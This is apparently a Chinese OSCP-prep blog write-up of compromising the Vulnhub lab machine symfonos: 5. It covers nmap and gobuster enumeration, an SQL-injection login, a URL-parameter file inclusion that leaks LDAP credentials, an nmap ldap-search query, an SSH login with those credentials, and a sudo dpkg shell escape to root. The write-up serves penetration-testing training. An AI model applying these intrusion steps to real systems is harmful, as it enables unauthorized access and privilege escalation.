OSCP备考_0x22_Vulnhub靶机_symfonos: 5

Ethan医生7个月前靶场241


名称说明
靶机下载链接https://www.vulnhub.com/entry/symfonos-52,415/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.188



arp-scan 192.168.233.1/24


image.png

nmap -p- 192.168.233.188 


image.png


nmap -p22,80,389,636 -A -sV -T5 192.168.233.188


image.png


gobuster dir -u http://192.168.233.188/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png

http://192.168.233.188/portraits.php

image.png

爆破admin.php 一直无法成功后面,使用万能账号可以登入

image.png

登入后发现有URL参数可以提交

image.png


192.168.233.188/home.php?url=http://127.0.0.1/portraits.php 

这边没有测试成功说是有文件包含可以利用URL

上述通过文件包含的形式获取到了文件admin.php的源代码,里面代码显示有ldap的相关信息,尝试直接使用nmap直接扫描ldap的端口389直接获得了一个账户为zeus密码是cetkKf4wCuHC9FET 具体获得的过程如下:

nmap 192.168.233.188 -p 389 --script ldap-search --script-args 'ldap.username="cn=admin,dc=symfonos,dc=local", ldap.password="qMDdyZh3cT6eeAWD"'

image.png0

userPassword: cetkKf4wCuHC9FET

使用此账户直接通过ssh登录目标靶机

image.png


image.png

利用dpkg,https://gtfobins.github.io/gtfobins/dpkg/

sudo dpkg -l
!/bin/sh

image.png


标签: OSCP

相关文章

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-2,331/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.1...

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

OSCP备考_0x40_HackThBox靶机_Windows_Bastard

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.253.131 (扫描TCP)查看到是Drupal 7.54ruby 44449.rb...

OSCP备考_0x41_HackThBox靶机_Windows_granny

OSCP备考_0x41_HackThBox靶机_Windows_granny

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.188 (扫描TCP)发现有webdav可以利用davtest -url htt...

OSCP备考_0x06_HackThBox靶机_Linux_Sense

OSCP备考_0x06_HackThBox靶机_Linux_Sense

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.131.103 (扫描TCP)上面的信息提供了直接跳转到443端口nmap -sU --top-ports...

 OSCP备考_0x11_Vulnhub靶机_IMF: 1

OSCP备考_0x11_Vulnhub靶机_IMF: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/imf-1,162/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.23...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。